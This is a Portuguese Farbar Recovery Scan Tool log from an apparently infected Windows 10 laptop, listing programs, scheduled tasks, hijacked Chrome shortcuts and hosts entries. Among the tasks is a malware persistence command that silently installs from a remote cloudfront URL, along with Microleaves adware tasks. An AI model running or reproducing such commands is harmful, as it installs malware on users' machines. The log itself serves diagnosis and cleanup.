Publicité
Publicité
Format du document : text/plain
Prévisualisation
Resultado do exame Adicional Farbar Recovery Scan Tool (x64) Versão: 23-04-2017 01
Executado por vinicius (25-04-2017 15:20:22)
Executando a partir de C:\Users\vinic\Downloads
Windows 10 Home Single Language Versão 1607 (X64) (2017-04-24 00:21:59)
Modo da Inicialização: Normal
==========================================================
==================== Contas: =============================
Administrador (S-1-5-21-1165987581-522194205-1901974268-500 - Administrator - Disabled)
Convidado (S-1-5-21-1165987581-522194205-1901974268-501 - Limited - Disabled)
DefaultAccount (S-1-5-21-1165987581-522194205-1901974268-503 - Limited - Disabled)
teste (S-1-5-21-1165987581-522194205-1901974268-1002 - Administrator - Enabled) => C:\Users\teste
vinicius (S-1-5-21-1165987581-522194205-1901974268-1001 - Administrator - Enabled) => C:\Users\vinic
==================== Central de Segurança ========================
(Se uma entrada for incluída na fixlist, será removida.)
AV: Norton Security (Disabled - Up to date) {53C7D717-52E2-B95E-FA61-6F32ECC805DB}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Norton Security (Disabled - Up to date) {E8A636F3-74D8-B6D0-C0D1-5440974F4F66}
FW: Norton Security (Disabled) {6BFC5632-188D-B806-D13E-C607121B42A0}
==================== Programas Instalados ======================
(Somente os programas adwares com a indicação "Oculto" podem ser adicionados à fixlist para desocultá-los. Os programas adwares devem ser desinstalados manualmente.)
1.0.0.1 (HKLM-x32\...\YeaDesktop) (Version: 1.0.0.1 - )
ColorEngine (HKLM-x32\...\{294D7592-989B-4EB9-BFCA-69545E0311E6}) (Version: 4.0 - Samsung Electronics CO., LTD.)
ETDWare X64 15.7.0.1_WHQL (HKLM\...\Elantech) (Version: 15.7.0.1 - ELAN Microelectronic Corp.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 58.0.3029.81 - Google Inc.)
Google Update Helper (x32 Version: 1.3.32.7 - Google Inc.) Hidden
Intel(R) Chipset Device Software (x32 Version: 10.1.1.8 - Intel(R) Corporation) Hidden
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.4276 - Intel Corporation)
Intel(R) Trusted Execution Engine (HKLM\...\{176E2755-0A17-42C6-88E2-192AB2131278}) (Version: 1.0.0.1064 - Intel Corporation)
Microsoft Office Professional Plus 2016 - pt-br (HKLM\...\ProPlusRetail - pt-br) (Version: 16.0.4266.1003 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1165987581-522194205-1901974268-1001\...\OneDriveSetup.exe) (Version: 17.3.6799.0327 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.30319 (HKLM-x32\...\{196BB40D-1578-3D01-B289-BEFC77A11A1E}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Norton Security (HKLM-x32\...\NS) (Version: 22.6.0.142 - Symantec Corporation)
Office 16 Click-to-Run Extensibility Component (x32 Version: 16.0.4266.1003 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (Version: 16.0.4266.1003 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (x32 Version: 16.0.4266.1003 - Microsoft Corporation) Hidden
Online Application (x32 Version: 2.6.0 - Microleaves) Hidden <==== ATENÇÃO
Online Support(S Service) (HKLM-x32\...\{C8996970-A56E-4659-B01B-CCB7097C4E59}) (Version: 1.1 - Samsung Electronics Co., Ltd.)
Peak Time Power Manager (HKLM-x32\...\{64D42C63-02D5-4129-A546-42BEC0D5AA77}) (Version: 1.0.0 - Samsung Electronics CO., LTD.)
Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 10.0.1.5 - Qualcomm Atheros)
Qualcomm Atheros Client Installation Program (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 10.0 - Qualcomm Atheros)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 10.0.10586.31225 - Realtek Semiconduct Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.3.723.2015 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7543 - Realtek Semiconductor Corp.)
S Agent (Version: 1.1.58 - Samsung Electronics Co., Ltd.) Hidden
Samsung Link (HKLM\...\{5A1F24BA-845E-4C89-BFF0-826FD9A6D4EB}) (Version: 2.0.1 - Samsung Electronics Co., Ltd.)
Samsung Recovery (HKLM\...\{D21EED26-59C0-4315-BDCC-D682496465E9}) (Version: 7.2.0 - Samsung Electronics Co., Ltd.)
Samsung Settings (HKLM-x32\...\{906320D6-3C1E-4C56-9B11-F17089D232F4}) (Version: 2.5.0 - Samsung Electronics Co., Ltd.)
Samsung SideSync (HKLM-x32\...\Samsung SideSync) (Version: 4.1.3.399 - Samsung Electronics Co., Ltd.)
Samsung Update (HKLM-x32\...\{00935958-A0DE-45AF-A3EA-F6960A99785C}) (Version: 2.2.32 - Samsung Electronics Co., Ltd.)
Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.56.0 - Samsung Electronics Co., Ltd.)
Skype™ 7.1 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.1.105 - Skype Technologies S.A.)
SpyHunter 4 (HKLM-x32\...\SpyHunter) (Version: 4.26.12.4815 - Enigma Software Group, LLC)
User Manual (HKLM-x32\...\{DA11CC4A-5E90-4EA9-8E7B-29D5328E35F0}) (Version: 1.4.00 - Samsung Electronics Co., Ltd.)
WinRAR 5.40 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)
WinRAR 5.40 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)
XSplit Broadcaster (HKLM-x32\...\{ADDCAC95-651D-4897-9B47-2083C35EE497}) (Version: 2.9.1701.1635 - SplitmediaLabs)
==================== Exame Personalizado CLSID (Whitelisted): ==========================
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
CustomCLSID: HKU\S-1-5-21-1165987581-522194205-1901974268-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\WINDOWS\system32\igfxEM.exe (Intel Corporation)
==================== Tarefas Agendadas (Whitelisted) =============
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
Task: {0AB9DACB-5FA2-4169-8AB1-18366B7FFE6C} - \SamsungLinkTray -> Nenhum Arquivo <==== ATENÇÃO
Task: {12E1CE2C-4A0C-4E75-9BA3-7FD2426B26B3} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-04-23] (Google Inc.)
Task: {167BC114-B0E9-44F9-9170-7C9D8AD56979} - System32\Tasks\Norton Security\Norton Autofix => C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\SymErr.exe [2016-02-10] (Symantec Corporation)
Task: {26463823-3CB1-4796-8BDF-E6FAB1840493} - \Samsung\Settings\SettingsPatternLoginMonitor -> Nenhum Arquivo <==== ATENÇÃO
Task: {276F96FC-8F20-4336-B260-BA0F5489C040} - System32\Tasks\Pritc => C:\Users\vinic\AppData\Local\Temp\is-671II.tmp\Setup.exe <==== ATENÇÃO
Task: {27F30408-1CCF-4027-815F-226CA1C8DDD8} - System32\Tasks\Online Application V2G3 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATENÇÃO
Task: {2BE3BCB0-1CBC-4CFE-86F7-DF60D0322DF4} - System32\Tasks\Online Application V2G2 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATENÇÃO
Task: {2CD54952-85F1-4213-B6BE-5FEDC58F5943} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-04-23] (Google Inc.)
Task: {3467C3BF-6A54-4AA5-938A-6F6BD01DA307} - \ColorEngine -> Nenhum Arquivo <==== ATENÇÃO
Task: {35FFC670-D8B1-4AE5-B351-AE48B5AEFAC2} - System32\Tasks\Norton Security\Norton Error Processor => C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\SymErr.exe [2016-02-10] (Symantec Corporation)
Task: {3D89AF19-A876-4B20-97A0-58032E37CEA3} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2015-08-16] (Microsoft Corporation)
Task: {3F4FF200-E4EB-4267-89FA-B2681700779F} - System32\Tasks\Chfokchomeent Reports => C:\Program Files (x86)\Rerhphzujsy\xjaaing.exe [2017-04-24] (Google Inc.)
Task: {3F911C51-1A05-487F-ACFA-22CD8451D00B} - System32\Tasks\Online Application V2G1 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATENÇÃO
Task: {4127AE2D-38FE-4EF6-AF0B-E747CAAE2F3B} - System32\Tasks\Microsoft\Windows\SysResetDelayedCleanup => C:\WINDOWS\system32\ResetEngine.exe [2017-04-23] (Microsoft Corporation)
Task: {46121999-81DB-46AA-867B-A7CAE0513436} - System32\Tasks\Norton WSC Integration => C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\WSCStub.exe [2016-02-26] (Symantec Corporation)
Task: {51673C9A-C9AF-48AF-952B-3A1777EA0965} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [2017-04-23] (Microsoft Corporation)
Task: {640CB1ED-4D9F-4C7B-AF9B-AAD40BD26658} - System32\Tasks\Nevetbsercult => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=ST500LM012XHN-M500MBB_S33XJ5CH600388&d=20170424 /q <==== ATENÇÃO
Task: {68C88969-7702-455F-9D65-292EC9B6FBD3} - \Samsung\Settings\LaunchSettings -> Nenhum Arquivo <==== ATENÇÃO
Task: {7A8C0450-A719-4EB2-8710-F02A5C4CA662} - System32\Tasks\CreateExplorerShellUnelevatedTask => C:\WINDOWS\Explorer.exe /NOUACCHECK
Task: {82FB29CE-0EF3-4E0C-A717-3BA28448A7BC} - \PowerManagement -> Nenhum Arquivo <==== ATENÇÃO
Task: {A91B21E4-41F5-4EC3-ABC7-3CCEBE74B380} - \Samsung\SRS\SRS Logon -> Nenhum Arquivo <==== ATENÇÃO
Task: {B70B0B8F-017D-4B85-A112-ECFDF06FDB2B} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [2017-04-23] (Microsoft Corporation)
Task: {B870557D-6068-4A56-9A41-BAB790379CB4} - System32\Tasks\SpyHunter4Startup => C:\Program Files\Enigma Software Group\SpyHunter\Spyhunter4.exe [2017-04-24] (Enigma Software Group USA, LLC.)
Task: {B8BFA7F3-4414-41D0-84EB-C0AD6ECD411D} - \Samsung\Settings\SettingsHibernateMonitor -> Nenhum Arquivo <==== ATENÇÃO
Task: {BD1DA6FC-A430-47C0-86DF-8AA460AA8A87} - \Samsung\Settings\SettingsPatternLoginAccountMonitor -> Nenhum Arquivo <==== ATENÇÃO
Task: {c6fef78c-7663-4c5e-8b5c-5f78e4e10a71} - não caminho do arquivo
Task: {CAD514CD-C06A-4603-BE01-1B72CF638D45} - System32\Tasks\Norton Security\Norton Error Analyzer => C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\SymErr.exe [2016-02-10] (Symantec Corporation)
Task: {D619036B-C463-499D-B14B-890C9A1E7D71} - System32\Tasks\RTKCPL => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [2015-06-18] (Realtek Semiconductor)
Task: {D74A1BB1-4B8F-4388-BDD1-049C92C47C6D} - System32\Tasks\Updater_Online_Application => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe [2017-04-18] (Microleaves)
Task: {DA6362A0-32F8-49B6-8043-5A02934E5F9C} - System32\Tasks\Remediation\AntimalwareMigrationTask => C:\Program Files\Common Files\AV\Norton Security\Upgrade.exe [2016-02-26] (Symantec Corporation)
Task: {DF259C57-BCC7-4BBF-91E6-E49241786588} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2015-08-16] (Microsoft Corporation)
Task: {E9CEFF48-50BC-48D7-A5C3-F16F3360EF00} - System32\Tasks\{82ACF0E0-E53D-479D-ADAF-110FD00F4500} => pcalua.exe -a "C:\Program Files (x86)\YeaDesktop\unins000.exe"
Task: {EC749A47-F6AE-45BC-BF58-932773DCEDB8} - \SAgent -> Nenhum Arquivo <==== ATENÇÃO
Task: {F867B8DE-016B-4E65-8DB1-7EF609803898} - \Samsung\Settings\SettingsEventHandlerMonitor -> Nenhum Arquivo <==== ATENÇÃO
Task: {FE18B14D-B40F-4FCF-BFC3-DFA0EF84A965} - \SecTimeSync\TimeSyncInit -> Nenhum Arquivo <==== ATENÇÃO
(Se uma entrada for incluída na fixlist, o arquivo da tarefa (.job) será movido. O arquivo que está sendo executado pela tarefa não será movido.)
Task: C:\WINDOWS\Tasks\Online Application V2G1.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATENÇÃO
Task: C:\WINDOWS\Tasks\Online Application V2G2.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATENÇÃO
Task: C:\WINDOWS\Tasks\Online Application V2G3.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATENÇÃO
Task: C:\WINDOWS\Tasks\Updater_Online_Application.job => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe
==================== Atalhos =============================
(As entradas podem ser listadas para serem restauradas ou removidas.)
WMI_ActiveScriptEventConsumer_ASEC: <===== ATENÇÃO
ShortcutWithArgument: C:\Users\vinic\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\vinic\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://www.yeadesktop.com/
ShortcutWithArgument: C:\Users\vinic\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\7eacadfa43776aec\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=ChromeDefaultData2
ShortcutWithArgument: C:\Users\vinic\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\360c22b137d62ce9\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=ChromeDefaultData
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\vinic\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://www.yeadesktop.com/
ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\vinic\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://www.yeadesktop.com/
==================== Módulos Carregados (Whitelisted) ==============
2016-07-16 08:42 - 2016-07-16 08:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2016-07-16 08:42 - 2017-04-23 19:56 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-07-16 08:42 - 2017-04-23 19:56 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00131768 _____ () C:\Program Files\Samsung\SamsungLink\Logger.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 02030776 _____ () C:\Program Files\Samsung\SamsungLink\SLCtxMenuExtension.dll
2016-07-16 08:42 - 2017-04-23 19:45 - 00130048 _____ () C:\WINDOWS\SYSTEM32\CHARTV.dll
2016-07-16 08:42 - 2017-04-23 19:46 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
2016-07-16 08:43 - 2017-04-23 19:50 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll
2016-07-16 08:43 - 2017-04-23 19:53 - 09761280 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-07-16 08:43 - 2017-04-23 19:53 - 01400320 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-07-16 08:43 - 2017-04-23 19:53 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll
2016-07-16 08:43 - 2017-04-23 19:53 - 01033728 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
2016-07-16 08:43 - 2017-04-23 19:53 - 02438144 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-07-16 08:43 - 2017-04-23 19:53 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 02808160 _____ () C:\Program Files\Samsung\SamsungLink\scs_masi.dll
2017-04-23 23:20 - 2015-08-16 00:21 - 00162880 _____ () C:\Program Files\Common Files\Microsoft Shared\ClickToRun\ApiClient.dll
2016-07-16 20:10 - 2016-07-16 20:10 - 00071168 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.4.86.0_x64__kzf8qxf38zg5c\SkypeHost.exe
2016-07-16 20:10 - 2016-07-16 20:10 - 00157184 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.4.86.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2016-07-16 20:10 - 2016-07-16 20:10 - 29443072 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.4.86.0_x64__kzf8qxf38zg5c\SkyWrap.dll
2017-04-24 17:23 - 2017-04-24 17:23 - 10650112 _____ () C:\Program Files\WindowsApps\Microsoft.WindowsStore_11701.1001.99.0_x64__8wekyb3d8bbwe\WinStore.Entertainment.Mobile.dll
2017-04-24 17:23 - 2017-04-24 17:23 - 02653184 _____ () C:\Program Files\WindowsApps\Microsoft.WindowsStore_11701.1001.99.0_x64__8wekyb3d8bbwe\MS.Entertainment.Common.Mobile.dll
2016-07-16 08:42 - 2017-04-23 19:52 - 00160768 _____ () C:\WINDOWS\system32\EditionUpgradeHelper.dll
2017-04-24 17:23 - 2017-04-24 17:23 - 00761344 _____ () C:\Program Files\WindowsApps\Microsoft.WindowsStore_11701.1001.99.0_x64__8wekyb3d8bbwe\WinStore.Vui.dll
2017-04-23 23:31 - 2017-04-19 02:03 - 03767640 _____ () C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.81\libglesv2.dll
2017-04-23 23:31 - 2017-04-19 02:03 - 00100696 _____ () C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.81\libegl.dll
2015-11-12 06:20 - 2015-11-12 06:20 - 00023360 _____ () C:\Program Files (x86)\Samsung\PowerCtrlManager\WSABI.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00038912 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\boost_date_time-vc90-mt-1_47.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00227840 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\boost_serialization-vc90-mt-1_47.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 01138176 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\DMSManager.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00012800 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\boost_system-vc90-mt-1_47.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00046592 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\boost_thread-vc90-mt-1_47.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00107008 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\DCMCDP.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00707072 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\ContentDirectoryPresenter.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00102400 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\FolderCDP.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00041472 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\DirectoryScanner.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00032768 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\Autobackup.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00055808 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\RosettaAllShare.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00078336 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\MetadataFramework.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00520234 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\sqlite3.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00450560 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\MoodExtractor.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 05717504 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\DCMImgExtractor.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00028672 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\AutoChaptering.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00028160 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\AudioExtractor.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00017920 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\VideoExtractor.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00012288 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\ImageExtractor.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00013824 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\TextExtractor.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00147456 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\libexpat.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00012288 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\VideoThumb.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00125952 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\ThumbnailMaker.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00137216 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\VideoMetadataDriver.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00024064 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\SECMetaDriver.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00064000 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\ID3Driver.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00022528 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\RichInfoDriver.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00024064 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\photoDriver.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 04671488 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\avcodec-52.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00686080 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\avformat-52.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00070656 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\avutil-50.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00152064 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\swscale-0.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00289792 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\libThumbnail.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 01033216 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\ImageMagickWrapper.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00366592 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\tag.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00290816 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\libKeyFrame.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00399826 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\libexif-12.dll.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00044032 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\us.dll
2015-08-30 20:45 - 2015-08-30 20:45 - 00211064 _____ () C:\Program Files (x86)\Samsung\ColorEngine\WinMove.dll
2014-10-07 07:47 - 2014-10-07 07:47 - 00023360 _____ () C:\Program Files (x86)\Samsung\Settings\CmdServer\WSABI.dll
2014-10-07 07:48 - 2014-10-07 07:48 - 00211064 _____ () C:\Program Files (x86)\Samsung\Settings\CmdServer\WinCRT.dll
==================== Alternate Data Streams (Whitelisted) =========
(Se uma entrada for incluída na fixlist, somente o ADS será removido.)
==================== Modo de Segurança (Whitelisted) ===================
(Se uma entrada for incluída na fixlist, será removida do Registro. O valor "AlternateShell" será restaurado.)
==================== Associação (Whitelisted) ===============
(Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido.)
==================== Internet Explorer confiável/restrito ===============
(Se uma entrada for incluída na fixlist, será removida do Registro.)
==================== Hosts Conteúdo: ==========================
(Se necessário, a diretiva Hosts: pode ser incluída na fixlist para redefinir o Hosts.)
2015-10-30 04:24 - 2017-04-24 00:18 - 00001123 ____N C:\WINDOWS\system32\Drivers\etc\hosts
127.0.0.1 cpm.paneladmin.pro
127.0.0.1 publisher.hmdiadmingate.xyz
127.0.0.1 distribution.hmdiadmingate.xyz
127.0.0.1 hmdicrewtracksystem.xyz
127.0.0.1 linkmate.space
127.0.0.1 space1.adminpressure.space
127.0.0.1 trackpressure.website
127.0.0.1 doctorlink.space
127.0.0.1 beautifllink.xyz
==================== Outras Áreas ============================
(Atualmente não há nenhuma correção automática para esta seção.)
HKU\S-1-5-21-1165987581-522194205-1901974268-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\vinic\Desktop\16508232_1325849700787395_445126336895742137_n.jpg
DNS Servers: 8.8.8.8 - 8.8.4.4
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Firewall do Windows está desabilitado.
==================== MSCONFIG/TASK MANAGER ítens desabilitados ==
==================== Regras do Firewall (Whitelisted) ===============
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{04F70115-B707-4C38-975B-570261CF5B8F}] => (Allow) C:\Program Files (x86)\Samsung\SideSync4\SideSync.exe
FirewallRules: [{357D725A-C85B-43A7-84CD-C7E1E072C6A0}] => (Allow) C:\Program Files (x86)\Samsung\SideSync4\SideSync.exe
FirewallRules: [{9F830F4C-D5F1-4967-B81F-C08DE1ED37C2}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{0D377A63-FE50-4E65-9F11-A32AC4BAE230}] => (Allow) LPort=16720
FirewallRules: [{22C73D6A-F379-406F-8074-DA21F3E4078B}] => (Allow) LPort=16720
FirewallRules: [{B2CA5026-AD3B-49A0-9000-DAC7FA3F0A19}] => (Allow) LPort=2869
FirewallRules: [{FF3D26D1-AE2A-4813-B5FB-B0D756D1AF8B}] => (Allow) LPort=1900
